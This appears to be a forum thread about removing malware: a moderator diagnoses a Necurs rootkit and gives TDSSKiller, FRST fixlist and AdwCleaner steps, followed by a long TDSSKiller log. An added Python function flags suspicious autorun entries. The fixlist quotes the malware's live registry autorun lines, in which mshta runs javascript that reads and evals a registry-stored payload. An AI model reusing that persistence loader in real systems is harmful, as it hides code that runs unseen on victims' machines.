Unable to run any antivirus or malware removal tool. [Solved]



#1
Joe Hunter

    New Member

  • Member
  • 9 posts
Hello, I'm pretty certain I have some malware or adware on my PC blocking the ability to scan amongst other things. Sometimes upon turning my PC off it will flash up multiple adverts that were seemingly running behind the scenes, which is weird.
Any help with this would be greatly appreciated as (rather ironically) I'm currently writing my Dissertation on cloud computing security!
Thanks in advance.


#2
Joe Hunter

    New Member

  • Topic Starter
  • Member
  • 9 posts

Having read through some other threads, I've run the Farbar Recovery tool and these are the logs.

Attached Files


Edited by Joe Hunter, 28 March 2016 - 01:07 PM.


#3
Essexboy

    GeekU Moderator

  • Retired Staff
  • 69,964 posts
Hi, you have a Necurs rootkit, so we will need to run several programmes to kill it.

Download the latest version of TDSSKiller from here and save it to your Desktop.
  • Double-click on TDSSKiller.exe to run the application.
  • Then click on Change parameters.
  • Check the boxes beside Verify Driver Digital Signature, Detect TDLFS file system and Use KSN to scan objects, then click OK.
  • Click the Start Scan button.
  • If a suspicious object is detected, the default action will be Skip; click on Continue.
  • If malicious objects are found, they will show in the Scan results and offer three (3) options.
  • Ensure Cure is selected, then click Continue => Reboot now to finish the cleaning process.
  • Get the report by selecting Reports.
  • Note: If Cure is not available, please choose Skip instead; do not choose Delete unless instructed.
Please copy and paste its contents on your next reply.

THEN

CAUTION: This fix is only valid for this specific machine; using it on another may break your computer.

Open notepad and copy/paste the text in the quotebox below into it:
 

CreateRestorePoint:
HKLM-x32\...\Run: [**eeb9c5dc<*>] => mshta javascript:VyIZ9J1V="VOf";Z2V8=new%20ActiveXObject("WScript.Shell");uJ45fzMWmA="Fe";GAj7Y=Z2V8.RegRead("HKLM\\software\\Wow6432Node\\e09000bd53\\76676c3b");nk0ceuWpp="XRl";eval(GAj7Y);tgL5ndl="H (the data entry has 5 more characters). <===== ATTENTION (Value Name with invalid characters)
HKLM\...\Policies\Explorer\Run: [**552f49b9<*>] => mshta javascript:mdDO90BSHt="Av";tr69=new%20ActiveXObject("WScript.Shell");Khb1nGB="LpdnVipZK3";AR2lR=tr69.RegRead("HKLM\\software\\Wow6432Node\\e09000bd53\\76676c3b");nubGY1N6K="1JadTvk";eval(AR2lR); (the data entry has 20 more characters). <===== ATTENTION (Value Name with invalid characters)
Toolbar: HKU\S-1-5-21-3655023002-2648474569-3043735959-1000 -> No Name - {2318C2B1-4965-11D4-9B18-009027A5CD4F} - No File
CHR Extension: (GGoSauve) - C:\Users\Joe\AppData\Local\Google\Chrome\User Data\Default\Extensions\jlabfejiidahciobclpfigdfpgfbedee [2014-09-25]
CHR HKLM\...\Chrome\Extension: [pflphaooapbgpeakohlggbpidpppgdff] - C:\Users\Joe\AppData\Local\mysearchdial-speeddial.crx <not found>
CHR HKU\S-1-5-21-3655023002-2648474569-3043735959-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pflphaooapbgpeakohlggbpidpppgdff] - C:\Users\Joe\AppData\Local\mysearchdial-speeddial.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [debmkdhphjfcbaomiknnceliiclnpmfg] - C:\Program Files (x86)\Jump Flip\debmkdhphjfcbaomiknnceliiclnpmfg.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [pflphaooapbgpeakohlggbpidpppgdff] - C:\Users\Joe\AppData\Local\mysearchdial-speeddial.crx <not found>
R2 syshost32; C:\Windows\Installer\{673C08DA-2B79-E036-1E40-630AFC5BA90F}\syshost.exe [215477 2015-12-22] () [File not signed]
2016-03-28 16:53 - 2014-09-25 20:28 - 00000000 ____D C:\ProgramData\4675a9632c473f58
Task: {46CF61D3-A536-490F-A3A3-5C1787480CBC} - System32\Tasks\UpdaterEX => C:\Users\Joe\AppData\Roaming\UpdaterEX\UpdateProc\UpdateTask.exe [2013-04-12] () <==== ATTENTION
C:\Users\Joe\AppData\Roaming\UpdaterEX
Task: C:\Windows\Tasks\UpdaterEX.job => C:\Users\Joe\AppData\Roaming\UPDATE~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
C:\Windows\Installer\{673C08DA-2B79-E036-1E40-630AFC5BA90F}
Reg: reg delete HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\IPSec\Policy\Local /f
Reg: reg delete HKLM\software\Wow6432Node\e09000bd53
cmd: sfc /scanfile=C:\Windows\system32\Drivers\volsnap.sys
RemoveProxy:
EmptyTemp:
CMD: bitsadmin /reset /allusers


Save this as fixlist.txt, in the same location as FRST.exe.
Run FRST and press Fix.
On completion a log will be generated; please post that.

FINALLY

Please download AdwCleaner by Xplode onto your desktop.
  • Close all open programs and internet browsers.
  • Double click on AdwCleaner.exe to run the tool.
  • Click on Scan.
  • After the scan is complete click on "Clean"
  • Confirm each time with Ok.
  • Your computer will be rebooted automatically. A text file will open after the restart.
  • Please post the content of that logfile with your next answer.
  • You can find the logfile at C:\AdwCleaner[S0].txt as well.
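
The two Run entries at the top of the fixlist in post #3 start mshta with an inline javascript: URL that reads a second registry value and passes it to eval(). The following is an added example, not part of the original post and not FRST's own code: a Python triage function that flags entries of that shape in FRST-style log text and reports which registry value the script loads. The function name, result fields and sample lines are constructed for illustration.

```python
import re
from urllib.parse import unquote

# FRST-style autorun line: "<key>: [<value name>] => <value data>"
ENTRY_RE = re.compile(
    r'^(?P<key>HK[^:\n]*?\\Run(?:Once)?): \[(?P<name>.*?)\] => (?P<data>.*)$')
# mshta started with an inline script URL rather than an .hta file
INLINE_RE = re.compile(
    r'\bmshta(?:\.exe)?"?\s+"?(?P<scheme>javascript|vbscript):', re.I)
# <var> = <shell object>.RegRead("<registry path>")
REGREAD_RE = re.compile(
    r'(?P<var>\w+)\s*=\s*\w+\.RegRead\(\s*"(?P<path>[^"]+)"\s*\)')
# FRST note appended when it did not print the whole value
TRUNC_RE = re.compile(r'\(the data entry has (\d+) more characters\)')

# Constructed sample lines (not taken from a real machine).
SAMPLE_FRST_LINES = r'''
HKLM\...\Run: [ExampleUpdater] => C:\Program Files\Example\updater.exe [12345 2016-01-01] (Example Corp)
HKLM-x32\...\Run: [**aaaa1111<*>] => mshta javascript:a1="x";s=new%20ActiveXObject("WScript.Shell");p=s.RegRead("HKLM\\software\\Wow6432Node\\examplekey\\exampleval");eval(p); (the data entry has 20 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-0-0-0-1000\...\Run: [Notes] => C:\Windows\System32\mshta.exe "C:\Users\Public\notes.hta"
'''


def triage_frst_run_entries(frst_text):
    """Return one finding per Run entry that starts mshta with an inline script."""
    findings = []
    for line in frst_text.splitlines():
        entry = ENTRY_RE.match(line.strip())
        if not entry:
            continue
        # Decode %20 and similar so the script reads as mshta would see it.
        data = unquote(entry.group('data'))
        inline = INLINE_RE.search(data)
        if not inline:
            continue  # ordinary executable or .hta file: outside this check
        payload_values = []
        evals_payload = False
        for read in REGREAD_RE.finditer(data):
            # The script source escapes backslashes; undo that to get the path.
            path = read.group('path').replace('\\\\', '\\')
            key, _, value = path.rpartition('\\')
            payload_values.append((key, value))
            # Is the variable that received the registry data handed to eval()?
            eval_re = r'\beval\(\s*' + re.escape(read.group('var')) + r'\s*\)'
            if re.search(eval_re, data):
                evals_payload = True
        trunc = TRUNC_RE.search(data)
        findings.append({
            'key': entry.group('key'),
            'value_name': entry.group('name'),
            'scheme': inline.group('scheme').lower(),
            'payload_values': payload_values,   # where the real script is stored
            'evals_payload': evals_payload,
            'hidden_chars': int(trunc.group(1)) if trunc else 0,
            'invalid_value_name': 'Value Name with invalid characters' in data,
        })
    return findings


if __name__ == '__main__':
    for finding in triage_frst_run_entries(SAMPLE_FRST_LINES):
        print(finding)
```

The payload_values field names the second registry location that has to be cleaned along with the Run entry, which is what the fixlist's reg delete line does for this machine.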


#4
Joe Hunter

    New Member

  • Topic Starter
  • Member
  • 9 posts

Report from TDSS Killer:

 

23:23:46.0619 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\disk.sys. md5: 9819EEE8B5EA3784EC4AF3B137A5244C, sha256: 571BC886E87C888DA96282E381A746D273B58B9074E84D4CA91275E26056D427
23:23:46.0619 0x18fc  Disk - detected LockedFile.Multi.Generic ( 1 )
23:23:46.0619 0x18fc  Object is SCO, delete is not allowed
23:23:46.0619 0x18fc  Disk ( LockedFile.Multi.Generic ) - warning
23:23:46.0619 0x18fc  Force sending object to P2P due to detect: Disk
23:23:46.0620 0x18fc  Object send P2P result: false
23:23:47.0096 0x18fc  [ DBFA9E9842C434B84052F18074866191, 91CEFF197870FF556978E23888CB7B5FDA14699E88887B4C25AFFF74F130F95F ] DisplayFusionService C:\Program Files (x86)\DisplayFusion\DisplayFusionService.exe
23:23:47.0136 0x18fc  DisplayFusionService - ok
23:23:47.0218 0x18fc  [ 676108C4E3AA6F6B34633748BD0BEBD9, 953286126E482EF3A9A1833680EFF86D657BD6C5411B9AEC2D7828ADE63D25AD ] Dnscache        C:\Windows\System32\dnsrslvr.dll
23:23:47.0298 0x18fc  Dnscache - ok
23:23:47.0348 0x18fc  [ 14452ACDB09B70964C8C21BF80A13ACB, DA0AAAC04626EFF4256D7095FF1DDA1F1B17676E26990C418BDF5090476F2AB4 ] dot3svc         C:\Windows\System32\dot3svc.dll
23:23:47.0442 0x18fc  dot3svc - ok
23:23:47.0590 0x18fc  [ 8C2BA6BEA949EE6E68385F5692BAFB94, 1047F473DCE0FB56BEA5C1B7929752C1FBAB5983C8202ABB4EEA48FCD60A353A ] DPS             C:\Windows\system32\dps.dll
23:23:47.0658 0x18fc  DPS - ok
23:23:47.0718 0x18fc  [ 9B19F34400D24DF84C858A421C205754, 967AF267B4124BADA8F507CEBF25F2192D146A4D63BE71B45BFC03C5DA7F21A7 ] drmkaud         C:\Windows\system32\drivers\drmkaud.sys
23:23:47.0718 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\drmkaud.sys. md5: 9B19F34400D24DF84C858A421C205754, sha256: 967AF267B4124BADA8F507CEBF25F2192D146A4D63BE71B45BFC03C5DA7F21A7
23:23:47.0718 0x18fc  drmkaud - detected LockedFile.Multi.Generic ( 1 )
23:23:47.0718 0x18fc  drmkaud ( LockedFile.Multi.Generic ) - warning
23:23:47.0860 0x18fc  [ EBCE0B0924835F635F620D19F0529DCE, 15BF803765373264390879FCA86C6D89C92DAFD0B1A36DEFA78EF01EBA2F9C26 ] DXGKrnl         C:\Windows\System32\drivers\dxgkrnl.sys
23:23:47.0860 0x18fc  Suspicious file ( NoAccess ): C:\Windows\System32\drivers\dxgkrnl.sys. md5: EBCE0B0924835F635F620D19F0529DCE, sha256: 15BF803765373264390879FCA86C6D89C92DAFD0B1A36DEFA78EF01EBA2F9C26
23:23:47.0860 0x18fc  DXGKrnl - detected LockedFile.Multi.Generic ( 1 )
23:23:47.0860 0x18fc  Object is SCO, delete is not allowed
23:23:47.0860 0x18fc  DXGKrnl ( LockedFile.Multi.Generic ) - warning
23:23:47.0860 0x18fc  Force sending object to P2P due to detect: DXGKrnl
23:23:47.0860 0x18fc  Object send P2P result: false
23:23:47.0982 0x18fc  [ E2DDA8726DA9CB5B2C4000C9018A9633, 0C967DBC3636A76A696997192A158AA92A1AF19F01E3C66D5BF91818A8FAEA76 ] EapHost         C:\Windows\System32\eapsvc.dll
23:23:48.0051 0x18fc  EapHost - ok
23:23:48.0446 0x18fc  [ DC5D737F51BE844D8C82C695EB17372F, 6D4022D9A46EDE89CEF0FAEADCC94C903234DFC460C0180D24FF9E38E8853017 ] ebdrv           C:\Windows\system32\DRIVERS\evbda.sys
23:23:48.0446 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\evbda.sys. md5: DC5D737F51BE844D8C82C695EB17372F, sha256: 6D4022D9A46EDE89CEF0FAEADCC94C903234DFC460C0180D24FF9E38E8853017
23:23:48.0456 0x18fc  ebdrv - detected LockedFile.Multi.Generic ( 1 )
23:23:48.0456 0x18fc  ebdrv ( LockedFile.Multi.Generic ) - warning
23:23:48.0456 0x18fc  Force sending object to P2P due to detect: ebdrv
23:23:48.0466 0x18fc  Object send P2P result: false
23:23:48.0519 0x18fc  [ 0793F40B9B8A1BDD266296409DBD91EA, 8A383FC9A66A327905C340D06138980F9E489479535A2C2AAE5E8BB14A74826E ] EFS             C:\Windows\System32\lsass.exe
23:23:48.0532 0x18fc  EFS - ok
23:23:48.0728 0x18fc  [ 3D69FAE60EDE442E004611A4EE4DB44C, 480D3F7604C9A70570BBFFF3CA0FABA216805BB38D4F8A73BB50996B547D8017 ] ehRecvr         C:\Windows\ehome\ehRecvr.exe
23:23:48.0823 0x18fc  ehRecvr - ok
23:23:48.0850 0x18fc  [ 4705E8EF9934482C5BB488CE28AFC681, 359E9EC5693CE0BE89082E1D5D8F5C5439A5B985010FF0CB45C11E3CFE30637D ] ehSched         C:\Windows\ehome\ehsched.exe
23:23:48.0920 0x18fc  ehSched - ok
23:23:49.0030 0x18fc  [ 0E5DA5369A0FCAEA12456DD852545184, 9A64AC5396F978C3B92794EDCE84DCA938E4662868250F8C18FA7C2C172233F8 ] elxstor         C:\Windows\system32\DRIVERS\elxstor.sys
23:23:49.0030 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\elxstor.sys. md5: 0E5DA5369A0FCAEA12456DD852545184, sha256: 9A64AC5396F978C3B92794EDCE84DCA938E4662868250F8C18FA7C2C172233F8
23:23:49.0030 0x18fc  elxstor - detected LockedFile.Multi.Generic ( 1 )
23:23:49.0030 0x18fc  Object is SCO, delete is not allowed
23:23:49.0030 0x18fc  elxstor ( LockedFile.Multi.Generic ) - warning
23:23:49.0030 0x18fc  Force sending object to P2P due to detect: elxstor
23:23:49.0030 0x18fc  Object send P2P result: false
23:23:49.0070 0x18fc  [ 34A3C54752046E79A126E15C51DB409B, 7D5B5E150C7C73666F99CBAFF759029716C86F16B927E0078D77F8A696616D75 ] ErrDev          C:\Windows\system32\DRIVERS\errdev.sys
23:23:49.0070 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\errdev.sys. md5: 34A3C54752046E79A126E15C51DB409B, sha256: 7D5B5E150C7C73666F99CBAFF759029716C86F16B927E0078D77F8A696616D75
23:23:49.0070 0x18fc  ErrDev - detected LockedFile.Multi.Generic ( 1 )
23:23:49.0070 0x18fc  Object is SCO, delete is not allowed
23:23:49.0070 0x18fc  ErrDev ( LockedFile.Multi.Generic ) - warning
23:23:49.0260 0x18fc  [ 4166F82BE4D24938977DD1746BE9B8A0, 24121751B7306225AD1C808442D7B030DEF377E9316AA0A3C5C7460E87317881 ] EventSystem     C:\Windows\system32\es.dll
23:23:49.0310 0x18fc  EventSystem - ok
23:23:49.0330 0x18fc  [ A510C654EC00C1E9BDD91EEB3A59823B, 76CD277730F7B08D375770CD373D786160F34D1481AF0536BA1A5D2727E255F5 ] exfat           C:\Windows\system32\drivers\exfat.sys
23:23:49.0330 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\exfat.sys. md5: A510C654EC00C1E9BDD91EEB3A59823B, sha256: 76CD277730F7B08D375770CD373D786160F34D1481AF0536BA1A5D2727E255F5
23:23:49.0330 0x18fc  exfat - detected LockedFile.Multi.Generic ( 1 )
23:23:49.0330 0x18fc  Object is SCO, delete is not allowed
23:23:49.0330 0x18fc  exfat ( LockedFile.Multi.Generic ) - warning
23:23:49.0360 0x18fc  [ 0ADC83218B66A6DB380C330836F3E36D, 798D6F83B5DBCC1656595E0A96CF12087FCCBE19D1982890D0CE5F629B328B29 ] fastfat         C:\Windows\system32\drivers\fastfat.sys
23:23:49.0360 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\fastfat.sys. md5: 0ADC83218B66A6DB380C330836F3E36D, sha256: 798D6F83B5DBCC1656595E0A96CF12087FCCBE19D1982890D0CE5F629B328B29
23:23:49.0360 0x18fc  fastfat - detected LockedFile.Multi.Generic ( 1 )
23:23:49.0360 0x18fc  Object is SCO, delete is not allowed
23:23:49.0360 0x18fc  fastfat ( LockedFile.Multi.Generic ) - warning
23:23:49.0360 0x18fc  Force sending object to P2P due to detect: fastfat
23:23:49.0360 0x18fc  Object send P2P result: false
23:23:49.0582 0x18fc  [ D607B2F1BEE3992AA6C2C92C0A2F0855, E22301C8F01DBF0A38A85165959BB070647C996CB1BCD50FDFE3DDDCA427DF2A ] Fax             C:\Windows\system32\fxssvc.exe
23:23:49.0682 0x18fc  Fax - ok
23:23:49.0732 0x18fc  [ D765D19CD8EF61F650C384F62FAC00AB, 9F0A483A043D3BA873232AD3BA5F7BF9173832550A27AF3E8BD433905BD2A0EE ] fdc             C:\Windows\system32\DRIVERS\fdc.sys
23:23:49.0732 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\fdc.sys. md5: D765D19CD8EF61F650C384F62FAC00AB, sha256: 9F0A483A043D3BA873232AD3BA5F7BF9173832550A27AF3E8BD433905BD2A0EE
23:23:49.0732 0x18fc  fdc - detected LockedFile.Multi.Generic ( 1 )
23:23:49.0732 0x18fc  Object is SCO, delete is not allowed
23:23:49.0732 0x18fc  fdc ( LockedFile.Multi.Generic ) - warning
23:23:49.0732 0x18fc  Force sending object to P2P due to detect: fdc
23:23:49.0733 0x18fc  Object send P2P result: false
23:23:49.0826 0x18fc  [ 0438CAB2E03F4FB61455A7956026FE86, 6D4DDC2973DB25CE0C7646BC85EFBCC004EBE35EA683F62162AE317C6F1D8DFE ] fdPHost         C:\Windows\system32\fdPHost.dll
23:23:49.0876 0x18fc  fdPHost - ok
23:23:49.0933 0x18fc  [ 802496CB59A30349F9A6DD22D6947644, 52D59D3D628D5661F83F090F33F744F6916E0CC1F76E5A33983E06EB66AE19F8 ] FDResPub        C:\Windows\system32\fdrespub.dll
23:23:49.0964 0x18fc  FDResPub - ok
23:23:49.0982 0x18fc  [ 655661BE46B5F5F3FD454E2C3095B930, 549C8E2A2A37757E560D55FFA6BFDD838205F17E40561E67F0124C934272CD1A ] FileInfo        C:\Windows\system32\drivers\fileinfo.sys
23:23:49.0982 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\fileinfo.sys. md5: 655661BE46B5F5F3FD454E2C3095B930, sha256: 549C8E2A2A37757E560D55FFA6BFDD838205F17E40561E67F0124C934272CD1A
23:23:49.0983 0x18fc  FileInfo - detected LockedFile.Multi.Generic ( 1 )
23:23:49.0983 0x18fc  Object is SCO, delete is not allowed
23:23:49.0983 0x18fc  FileInfo ( LockedFile.Multi.Generic ) - warning
23:23:50.0007 0x18fc  [ 5F671AB5BC87EEA04EC38A6CD5962A47, 6B61D3363FF3F9C439BD51102C284972EAE96ACC0683B9DC7E12D25D0ADC51B6 ] Filetrace       C:\Windows\system32\drivers\filetrace.sys
23:23:50.0007 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\filetrace.sys. md5: 5F671AB5BC87EEA04EC38A6CD5962A47, sha256: 6B61D3363FF3F9C439BD51102C284972EAE96ACC0683B9DC7E12D25D0ADC51B6
23:23:50.0008 0x18fc  Filetrace - detected LockedFile.Multi.Generic ( 1 )
23:23:50.0008 0x18fc  Object is SCO, delete is not allowed
23:23:50.0008 0x18fc  Filetrace ( LockedFile.Multi.Generic ) - warning
23:23:50.0008 0x18fc  Force sending object to P2P due to detect: Filetrace
23:23:50.0009 0x18fc  Object send P2P result: false
23:23:50.0056 0x18fc  [ C172A0F53008EAEB8EA33FE10E177AF5, 9175A95B323696D1B35C9EFEB7790DD64E6EE0B7021E6C18E2F81009B169D77B ] flpydisk        C:\Windows\system32\DRIVERS\flpydisk.sys
23:23:50.0056 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\flpydisk.sys. md5: C172A0F53008EAEB8EA33FE10E177AF5, sha256: 9175A95B323696D1B35C9EFEB7790DD64E6EE0B7021E6C18E2F81009B169D77B
23:23:50.0056 0x18fc  flpydisk - detected LockedFile.Multi.Generic ( 1 )
23:23:50.0056 0x18fc  Object is SCO, delete is not allowed
23:23:50.0056 0x18fc  flpydisk ( LockedFile.Multi.Generic ) - warning
23:23:50.0056 0x18fc  Force sending object to P2P due to detect: flpydisk
23:23:50.0056 0x18fc  Object send P2P result: false
23:23:50.0216 0x18fc  [ F7866AF72ABBAF84B1FA5AA195378C59, 9D522044FE9C18FB3EC327E675737C01F2A8231DDE900421D3A431596946A7F8 ] FltMgr          C:\Windows\system32\drivers\fltmgr.sys
23:23:50.0216 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\fltmgr.sys. md5: F7866AF72ABBAF84B1FA5AA195378C59, sha256: 9D522044FE9C18FB3EC327E675737C01F2A8231DDE900421D3A431596946A7F8
23:23:50.0216 0x18fc  FltMgr - detected LockedFile.Multi.Generic ( 1 )
23:23:50.0216 0x18fc  Object is SCO, delete is not allowed
23:23:50.0216 0x18fc  FltMgr ( LockedFile.Multi.Generic ) - warning
23:23:50.0296 0x18fc  [ 508401A63E6B1CBF0B9C9A011498731F, F636B0A9C0EB6AE7EC04E5C5FD8A0578AEB76A1B0D974F355BCE6B6091901725 ] FNETTBOH_305    C:\Windows\system32\drivers\FNETTBOH_305.SYS
23:23:50.0296 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\FNETTBOH_305.SYS. md5: 508401A63E6B1CBF0B9C9A011498731F, sha256: F636B0A9C0EB6AE7EC04E5C5FD8A0578AEB76A1B0D974F355BCE6B6091901725
23:23:50.0306 0x18fc  FNETTBOH_305 - detected LockedFile.Multi.Generic ( 1 )
23:23:50.0306 0x18fc  FNETTBOH_305 ( LockedFile.Multi.Generic ) - warning
23:23:50.0316 0x18fc  [ E341178C116DAC6A3A764587E68DFA7B, 91B4C79057908A622666FF069CF1C7ECA42952A6587432F5E99E33E8B19D29AF ] FNETURPX        C:\Windows\system32\drivers\FNETURPX.SYS
23:23:50.0316 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\FNETURPX.SYS. md5: E341178C116DAC6A3A764587E68DFA7B, sha256: 91B4C79057908A622666FF069CF1C7ECA42952A6587432F5E99E33E8B19D29AF
23:23:50.0316 0x18fc  FNETURPX - detected LockedFile.Multi.Generic ( 1 )
23:23:50.0316 0x18fc  FNETURPX ( LockedFile.Multi.Generic ) - warning
23:23:50.0316 0x18fc  Force sending object to P2P due to detect: FNETURPX
23:23:50.0316 0x18fc  Object send P2P result: false
23:23:50.0446 0x18fc  [ 8AC4CB4EA61E41009FAE9AE7B2B5DA3A, 6587B22ED91F98D3E3614967F62D7A58F42C12F45F8E1D47835D195CD350BC54 ] FontCache       C:\Windows\system32\FntCache.dll
23:23:50.0526 0x18fc  FontCache - ok
23:23:50.0578 0x18fc  [ 8D89E3131C27FDD6932189CB785E1B7A, AC7DA4C5E6D2E41D1A1DE146E46F034FAF0FB11AD801F070F2D5CD08166E9EB7 ] FontCache3.0.0.0 C:\Windows\Microsoft.Net\Framework64\v3.0\WPF\PresentationFontCache.exe
23:23:50.0588 0x18fc  FontCache3.0.0.0 - ok
23:23:50.0617 0x18fc  [ D43703496149971890703B4B1B723EAC, F06397B2EDCA61629249D2EF1CBB7827A8BEAB8488246BD85EF6AE1363C0DA6E ] FsDepends       C:\Windows\system32\drivers\FsDepends.sys
23:23:50.0617 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\FsDepends.sys. md5: D43703496149971890703B4B1B723EAC, sha256: F06397B2EDCA61629249D2EF1CBB7827A8BEAB8488246BD85EF6AE1363C0DA6E
23:23:50.0617 0x18fc  FsDepends - detected LockedFile.Multi.Generic ( 1 )
23:23:50.0618 0x18fc  FsDepends ( LockedFile.Multi.Generic ) - warning
23:23:50.0648 0x18fc  [ E95EF8547DE20CF0603557C0CF7A9462, 55540B06B7B380CA2DA6EEE2D76C6CD6131ADB02B2D0B172A36536863A0C57B6 ] Fs_Rec          C:\Windows\system32\drivers\Fs_Rec.sys
23:23:50.0648 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\Fs_Rec.sys. md5: E95EF8547DE20CF0603557C0CF7A9462, sha256: 55540B06B7B380CA2DA6EEE2D76C6CD6131ADB02B2D0B172A36536863A0C57B6
23:23:50.0648 0x18fc  Fs_Rec - detected LockedFile.Multi.Generic ( 1 )
23:23:50.0648 0x18fc  Object is SCO, delete is not allowed
23:23:50.0648 0x18fc  Fs_Rec ( LockedFile.Multi.Generic ) - warning
23:23:50.0710 0x18fc  [ AE87BA80D0EC3B57126ED2CDC15B24ED, 7E0EA3CDB78054D9A4E3B5142305943F2914536D80B8FC363414C8838D51D56C ] fvevol          C:\Windows\system32\DRIVERS\fvevol.sys
23:23:50.0710 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\fvevol.sys. md5: AE87BA80D0EC3B57126ED2CDC15B24ED, sha256: 7E0EA3CDB78054D9A4E3B5142305943F2914536D80B8FC363414C8838D51D56C
23:23:50.0710 0x18fc  fvevol - detected LockedFile.Multi.Generic ( 1 )
23:23:50.0710 0x18fc  Object is SCO, delete is not allowed
23:23:50.0710 0x18fc  fvevol ( LockedFile.Multi.Generic ) - warning
23:23:50.0710 0x18fc  Force sending object to P2P due to detect: fvevol
23:23:50.0720 0x18fc  Object send P2P result: false
23:23:50.0750 0x18fc  [ 8C778D335C9D272CFD3298AB02ABE3B6, 85F0B13926B0F693FA9E70AA58DE47100E4B6F893772EBE4300C37D9A36E6005 ] gagp30kx        C:\Windows\system32\DRIVERS\gagp30kx.sys
23:23:50.0750 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\gagp30kx.sys. md5: 8C778D335C9D272CFD3298AB02ABE3B6, sha256: 85F0B13926B0F693FA9E70AA58DE47100E4B6F893772EBE4300C37D9A36E6005
23:23:50.0750 0x18fc  gagp30kx - detected LockedFile.Multi.Generic ( 1 )
23:23:50.0750 0x18fc  Object is SCO, delete is not allowed
23:23:50.0750 0x18fc  gagp30kx ( LockedFile.Multi.Generic ) - warning
23:23:50.0820 0x18fc  [ 8E98D21EE06192492A5671A6144D092F, B8F656B34D361EA5AFB47F3A67AB2221580DADA59C8CD0CB83181E4AD8B562B4 ] GEARAspiWDM     C:\Windows\system32\DRIVERS\GEARAspiWDM.sys
23:23:50.0820 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\GEARAspiWDM.sys. md5: 8E98D21EE06192492A5671A6144D092F, sha256: B8F656B34D361EA5AFB47F3A67AB2221580DADA59C8CD0CB83181E4AD8B562B4
23:23:50.0820 0x18fc  GEARAspiWDM - detected LockedFile.Multi.Generic ( 1 )
23:23:50.0820 0x18fc  GEARAspiWDM ( LockedFile.Multi.Generic ) - warning
23:23:50.0820 0x18fc  Force sending object to P2P due to detect: GEARAspiWDM
23:23:50.0820 0x18fc  Object send P2P result: false
23:23:50.0942 0x18fc  [ FE5AB4525BC2EC68B9119A6E5D40128B, 088DE37982CEE78A0C1181389A3BFF1E352DF504074B3E8F3EA244DB271BF216 ] gpsvc           C:\Windows\System32\gpsvc.dll
23:23:51.0144 0x18fc  gpsvc - ok
23:23:51.0254 0x18fc  [ E1B44A75947137F4143308D566889837, EC7E883E7AF38BF3AC0AC513CFDE0186038443E9ACC7AD616EE6BD0EC09AACB9 ] gupdate         C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
23:23:51.0264 0x18fc  gupdate - ok
23:23:51.0274 0x18fc  [ E1B44A75947137F4143308D566889837, EC7E883E7AF38BF3AC0AC513CFDE0186038443E9ACC7AD616EE6BD0EC09AACB9 ] gupdatem        C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
23:23:51.0274 0x18fc  gupdatem - ok
23:23:51.0380 0x18fc  [ 1E6438D4EA6E1174A3B3B1EDC4DE660B, F9995CFEC7BBFE10B06EEE04CA6B49658275C43096E57747BFF9C2C31A0F9011 ] hamachi         C:\Windows\system32\DRIVERS\hamachi.sys
23:23:51.0380 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\DRIVERS\hamachi.sys. md5: 1E6438D4EA6E1174A3B3B1EDC4DE660B, sha256: F9995CFEC7BBFE10B06EEE04CA6B49658275C43096E57747BFF9C2C31A0F9011
23:23:51.0381 0x18fc  hamachi - detected LockedFile.Multi.Generic ( 1 )
23:23:51.0381 0x18fc  hamachi ( LockedFile.Multi.Generic ) - warning
23:23:51.0420 0x18fc  [ F2523EF6460FC42405B12248338AB2F0, B2F3DE8DE1F512D871BC2BC2E8D0E33AB03335BFBC07627C5F88B65024928E19 ] hcw85cir        C:\Windows\system32\drivers\hcw85cir.sys
23:23:51.0420 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\hcw85cir.sys. md5: F2523EF6460FC42405B12248338AB2F0, sha256: B2F3DE8DE1F512D871BC2BC2E8D0E33AB03335BFBC07627C5F88B65024928E19
23:23:51.0421 0x18fc  hcw85cir - detected LockedFile.Multi.Generic ( 1 )
23:23:51.0421 0x18fc  hcw85cir ( LockedFile.Multi.Generic ) - warning
23:23:51.0421 0x18fc  Force sending object to P2P due to detect: hcw85cir
23:23:51.0422 0x18fc  Object send P2P result: false
23:23:51.0476 0x18fc  [ 6410F6F415B2A5A9037224C41DA8BF12, 5B8452BC49FDA2215281D27B22FA9BE46B0460F51C4DC70E58B687CFB541F3A5 ] HdAudAddService C:\Windows\system32\drivers\HdAudio.sys
23:23:51.0476 0x18fc  Suspicious file ( NoAccess ): C:\Windows\system32\drivers\HdAudio.sys. md5: 6410F6F415B2A5A9037224C41DA8BF12, sha256: 5B8452BC49FDA2215281D27B22FA9BE46B0460F51C4DC70E58B687CFB541F3A5
23:23:51.0476 0x18fc  HdAudAddService - detected LockedFile.Multi.Generic ( 1 )
